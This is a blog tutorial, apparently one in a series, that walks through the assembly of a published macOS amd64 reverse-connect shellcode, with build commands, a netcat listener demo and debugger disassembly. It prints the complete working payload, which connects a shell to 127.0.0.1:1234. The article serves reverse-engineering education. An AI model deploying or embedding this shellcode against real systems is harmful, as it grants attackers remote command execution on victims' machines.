The reverse connect shell

The reverse connect shell

MacOS Shellcode Primer #4

Abstract

In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.

In the last article, we will put together what we have learnt so far and we will create a reverse bind shell

Keywords

reverse bind shell, socket, sys_dup2, execve, connect.

The code

We start with compiling the code from the well-known website:

bits 64
global _main
_main:


; 79 byte reverse shell
;
    bits    64

    mov     rcx, ~0x0100007fd2040200
    not     rcx
    push    rcx

    xor     ebp, ebp
    bts     ebp, 25
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax
    cdq                      ; rdx=IPPROTO_IP
    push    1
    pop     rsi              ; rsi=SOCK_STREAM
    push    2
    pop     rdi              ; rdi=AF_INET
    mov     al, 97
    syscall

    xchg    eax, edi         ; edi=s
    xchg    eax, esi         ; esi=2

    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax              ; eax = 0x02000000
    mov     al, 90           ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed

    ; step 3, connect to remote host
    ; connect (sockfd, {AF_INET,1234,127.0.0.1}, 16);
    push    rbp
    pop     rax
    push    rsp
    pop     rsi
    mov     dl, 16           ; rdx=sizeof(sa)
    mov     al, 98           ; rax=sys_connect
    syscall

    ; step 4, execute /bin/sh
    ; execve("/bin//sh", NULL, 0);
    push    rax
    pop     rsi
    push    rbp
    pop     rax
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    mov     al, 59           ; rax=sys_execve
    syscall

Compiling this code is not different from the usual:

gbiondo@tripleX reverse connect shell % nasm -f macho64 rcs.asm 
gbiondo@tripleX reverse connect shell % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem rcs.o -o reverseConnectShell

Now from another terminal we launch a netcat shell:

gbiondo@tripleX ~ % pwd
/Users/gbiondo
gbiondo@tripleX ~ % /usr/bin/nc -l  1234
...

And we launch the reverse shell:

gbiondo@ tripleX reverse connect shell % ./reverseConnectShell

On the first terminal, we can issue commands as if these were launched from the second shell:

gbiondo@tripleX ~ % /usr/bin/nc -l  1234
pwd
/Users/gbiondo/EXP312/Odzhan/reverse connect shell

It works fine.

It must be observed that if there is no shell to connect to, the given shellcode crashes with a segmentation fault.

This time we opt for another strategy to do the reverse engineering exercise. First, we collect all the launched syscalls, and we look through their documentation, if needed.

Last byte syscall signature
97 int socket(int domain, int type, int protocol);
98 int sys_dup2(u_int from, u_int to);
90 int connect(int s, caddr_t name, socklen_t namelen);
59 int execve(char *fname, char **argp, char **envp);

The syscalls shouldn’t be new to the aficionados of this series – however, if you have lost the articles:

So the algorithm will be:

Screenshot 2022-04-29 at 09.54.52.png

To save some time later, let's remember that according to the AMD calling convention, the registers shall contain the values as described below:

syscall
Parameter 1
Parameter 2
Parameter 3
Registers
RDI
RSI
RDX
socket domain type protocol
sys_dup2 from to n/a
connect Socket file descriptor Address Address length
execve path arguments Global variables

As I said in a previous article, when working with projects it’s always better to view both lldb and a visual disassembler. It gives a wide view of how the same result can be achieved in different manners. For instance, the original code:

mov     rcx, ~0x0100007fd2040200
    not     rcx

has been disassembled by lldb as:

reverseConnectShell[0x100003f69] <+0>:  movabs rcx, -0x100007fd2040201
reverseConnectShell[0x100003f73] <+10>: not    rcx

and by hopper as:

0000000100003f69         movabs     rcx, 0xfeffff802dfbfdff
0000000100003f73         not        rcx

Now, movabs and mov can be considered synonyms, in this context (see this link for more information), and yet the operands are different.

In the first case, the whole process has been already discussed in the article “Binding a shell”. We re-do this once more here:

Screenshot 2022-04-29 at 10.16.00.png

This shows that the approach of the original code and the one of hopper are equivalent.

Negative numbers are obtained with 2's complement, so we have:

Screenshot 2022-04-29 at 10.16.54.png

This finally proves that the three approaches are equivalent. As a point of interest, it’d have been way faster writing a simple piece of code:

#include <stdio.h>

int main() {
    long myInt;
    myInt = 0x100007fd2040201;
    myInt *= -1;
    printf("Original number made negative, in hex: %#lx\n",myInt);

    return 0;
}

Or, damnit! you may use any scientific calculator that has programming features!

Now that we agree on the data, we can proceed with the analysis. For the sake of clarity, I am subdividing the code in chunks; the separators being the syscall instructions (and subsequent return value storing, if pertinent).

To make the things clearer, I will also show the contents of the registers and the stack.

First chunk: invoking socket

In other words, this is the main program until the loop. The disassembled code is:

(lldb) disassemble -n main
reverseConnectShell`main:
reverseConnectShell[0x100003f69] <+0>:  movabs rcx, -0x100007fd2040201
reverseConnectShell[0x100003f73] <+10>: not    rcx
reverseConnectShell[0x100003f76] <+13>: push   rcx
reverseConnectShell[0x100003f77] <+14>: xor    ebp, ebp
reverseConnectShell[0x100003f79] <+16>: bts    ebp, 0x19
reverseConnectShell[0x100003f7d] <+20>: push   rbp
reverseConnectShell[0x100003f7e] <+21>: pop    rax
reverseConnectShell[0x100003f7f] <+22>: cdq    
reverseConnectShell[0x100003f80] <+23>: push   0x1
reverseConnectShell[0x100003f82] <+25>: pop    rsi
reverseConnectShell[0x100003f83] <+26>: push   0x2
reverseConnectShell[0x100003f85] <+28>: pop    rdi
reverseConnectShell[0x100003f86] <+29>: mov    al, 0x61
reverseConnectShell[0x100003f88] <+31>: syscall 
reverseConnectShell[0x100003f8a] <+33>: xchg   eax, edi
reverseConnectShell[0x100003f8b] <+34>: xchg   eax, esi

We have already seen what happens in <+0>. The effect of the operation <+10> is simply flipping the bytes in RCX, this is put in the stack in <+13>.

Let's observe the result of the not, although the mechanism should be very clear by now:

Screenshot 2022-04-29 at 10.26.49.png

What is this all about

We didn’t look at the man page of the connect instruction, taking it somehow for granted. Let’s do it now.

man 2 connect gives:

int connect(int socket, const struct sockaddr *address, socklen_t address_len);

DESCRIPTION The parameter socket is a socket. If it is of type SOCK_DGRAM, this call specifies the peer with which the socket is to be associated; this address is that to which datagrams are to be sent, and the only address from which datagrams are to be received. If the socket is of type SOCK_STREAM, this call attempts to make a connection to another socket. The other socket is specified by address, which is an address in the communications space of the socket. Each communications space interprets the address parameter in its own way. Generally, stream sockets may successfully connect() only once; datagram sockets may use connect() multiple times to change their association. Datagram sockets may dissolve the association by calling disconnectx(2), or by connecting to an invalid address, such as a null address or an address with the address family set to AF_UNSPEC (the error EAFNOSUPPORT will be harmlessly returned).

Now, we have already seen a const struct sockaddr *address passed to a syscall when we analysed bind. We have seen how to calculate the length, which is 16 bytes and how the fields are populated. Let’s get shortly back to that, remembering that the author wants to invoke connect with the parameters (sockfd, {AF_INET,1234,127.0.0.1}, 16). The first and the last should be immediate to understand, so we focus on the second one, namely {AF_INET,1234,127.0.0.1}.

  • The value of the constant AF_INET is 0x02.
  • 1234 is an immediate constant. In hex that value is represented as 0x04D2.
  • The remaining, 127.0.0.1, can be represented as 0x7F 0x00 0x00 0x01.
  • Finally, we know that a const struct sockaddr *address has an initial field, sin_len, which is 1-byte long, and must be null: 0x00.

All these, taken altogether:

Screenshot 2022-04-29 at 11.10.33.png

The piece of code prepares the contents that will be pointed after by *address.

However, the situation before <+13> is executed is:

Screenshot 2022-04-29 at 11.55.54.png

and after its execution we have:

Screenshot 2022-04-29 at 11.57.59.png

The next instruction (<+14>) zeroes the contents of ebp, which are the last 32 bits of rpb – side effect of this action is zeroing also rbp; and the one after (<+16>) sets the 26th (0x19=26 – but also this should be clear by now) bit of the register to 1.

This prepares a 0x0000000002000000 value for the syscall without spawning null-bytes. Doing this makes a constant that is used during the preparations of the syscalls (do once and then use it!). In fact, the very next two operations store the value in the stack (<+20>) and stores it into rax (<+21>).

Screenshot 2022-04-29 at 12.16.09.png

The CDQ instruction (<+22>) sets RDX to 0, since eax is signed positive.

The effect of the two instructions <+23> and <+25> is to store the value 1 into rsi without generating null-bytes:

Screenshot 2022-04-30 at 08.26.18.png

and similarly, with <+26> and <+28> the value 2 is stored into rdi without generating null-bytes:

Screenshot 2022-04-30 at 08.28.04.png

Finally, in <+29>, the first syscall is prepared. The situation before and after the syscall is reported below, changes highlighted in red:

Screenshot 2022-04-30 at 08.30.10.png

A new socket is created, and its value (3) is stored into rax.

The remaining two actions (namely, <+33> and <+34>) swap the contents of the two registers. At the end of the execution we have:

Screenshot 2022-04-30 at 08.35.53.png

Time to look at the next chunk

dup_loop64

Note that the numeration restarts, but since there's no further label, the program will keep on using the internal numbering also after the jump instruction. This is actually meaningful, from the point of view of the assembly language - the humans must adapt to that :) But we won't surrender, and we'll stubbornly keep on subdividing into smaller chunks :)

reverseConnectShell[0x100003f8c] <+0>:  push   rbp
reverseConnectShell[0x100003f8d] <+1>:  pop    rax
reverseConnectShell[0x100003f8e] <+2>:  mov    al, 0x5a
reverseConnectShell[0x100003f90] <+4>:  syscall 
reverseConnectShell[0x100003f92] <+6>:  sub    esi, 0x1
reverseConnectShell[0x100003f95] <+9>:  jns    0x100003f8c               ; <+0>

At a glance, this routine is very easy to reverse: <+0>, <+1>, and <+2> prepare the syscall (<+4>) using the value of rsi. The register rsi initial value is 2 (STDERR), then becomes 1 (STDOUT), and finally becomes 0 which corresponds to STDIN. Chiefly, this associates the socket file descriptor (rdi, never changing) to the three aforementioned streams. In fact, at each iteration rsi is decremented (<+6>), and the jump is performed only upon non-negative results (<+9>). Easy peasy.

We show a quick example of how the registers are impacted by this loop. The initial push and pop:

Screenshot 2022-05-01 at 07.42.34.png

and the final ones:

Screenshot 2022-05-01 at 07.43.59.png

When the loop terminates, the values of the registers is as follows:

Screenshot 2022-05-01 at 07.46.05.png

This closes the dup_loop64 chunk.

Connect

This may seem the most tricky part of the whole exercise, because it really deals with the stack.

The code is:

reverseConnectShell[0x100003f97] <+11>: push   rbp
reverseConnectShell[0x100003f98] <+12>: pop    rax
reverseConnectShell[0x100003f99] <+13>: push   rsp
reverseConnectShell[0x100003f9a] <+14>: pop    rsi
reverseConnectShell[0x100003f9b] <+15>: mov    dl, 0x10
reverseConnectShell[0x100003f9d] <+17>: mov    al, 0x62
reverseConnectShell[0x100003f9f] <+19>: syscall

Let us focus on the contents of the stack, first. The stack pointer (rsp) contains the value 0x00007FF7BFEFFA20. At this location, the stack contains the previously built struct sockaddr. By now, should be clear the effect of the instructions <+11> and <+12>: they basically prepare the syscall. After the execution of those instructions, the stack pointer still contains struct's address. That address is then stored in rsi with the usual push/pop mechanism, thus populating the value of the second parameter of the syscall. The third parameter must be stored in rdx, whose last byte is set to 0x10 in <+15>. Fianlly, rdi, which contained the file descriptor of the socket, hasn't changed. The syscall is perfectioned in <+17> and then invoked in <+19>.

The final part is the execution of the shell, we have already analysed it in previous articles. Please, refer to them.

Conclusions

The aim of this series was multifold. First of all, I wanted to show that even with no assembly talent, we can understand shellcode (and we built some of that talent in this process, indeed!). I also wanted to show how to do static analysis. It's a lengthy process (the technical term is PitA), error-prone, but gives lots of satisfaction. Assembly is not that harsh monstrosity one expects it to be. It's not easy either, anyway, so you may want to build further skills on that. We have also seen some binary analysis.

... and all this, just by reverse engineering!

Did you find this article valuable?

Support Gabriele Biondo by becoming a sponsor. Any amount is appreciated!